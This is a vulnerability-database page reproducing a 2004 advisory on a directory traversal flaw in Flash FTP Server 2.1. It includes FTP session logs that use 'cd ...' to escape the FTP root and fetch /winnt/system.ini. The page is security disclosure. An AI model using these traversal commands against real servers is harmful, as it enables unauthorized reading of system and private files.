Lucene search

K

FlashFTPtraverse.txt

🗓️ 22 Jul 2004 00:00:00Reported by CoolICEType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Flash FTP Server version 2.1 has a directory traversal vulnerability allowing unauthorized access.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Application: Flash FTP Server  
Vendors: http://www.net2soft.com/downloads/flashftpserver.exe  
Version: 1.0(2.1?)  
Platforms: Windows  
Bug: Directory Traversal  
Date: 2004-06-9  
Author: CoolICE  
e-mail: CoolICE#China.com  
================  
TestCode:  
C:\>ftp localhost  
Connected to server.  
220 Flash FTP Server v2.1 ready...  
User (server:(none)): CoolICE  
331 Password required for CoolICE.  
Password:  
230 User CoolICE logged in.  
ftp> get /winnt/system.ini  
200 Port command successful.  
150 Opening data connection for /winnt/system.ini.  
226 File sent ok  
ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec  
ftp>  
--------------------------  
C:\>ftp -d localhost  
Connected to server.  
220 Flash FTP Server v2.1 ready...  
User (Server:(none)): anonymous  
---> USER anonymous  
331 Password required for anonymous.  
Password:  
---> PASS [email protected]  
230 User anonymous logged in.  
ftp> pwd  
---> XPWD  
257 "/C:/inetpub/ftproot/" is current directory.  
ftp> cd /  
---> CWD /  
501 CWD failed. No permission  
---> CWD ..  
501 CWD failed. No permission  
ftp> cd ...  
---> CWD ...  
250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory.  
ftp> cd /  
---> CWD /  
501 Cannot accept relative path using dot notation  
ftp> pwd  
---> XPWD  
257 "/C:/" is current directory.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Jul 2004 00:00Current
7.4High risk
Vulners AI Score7.4
17
.json
Report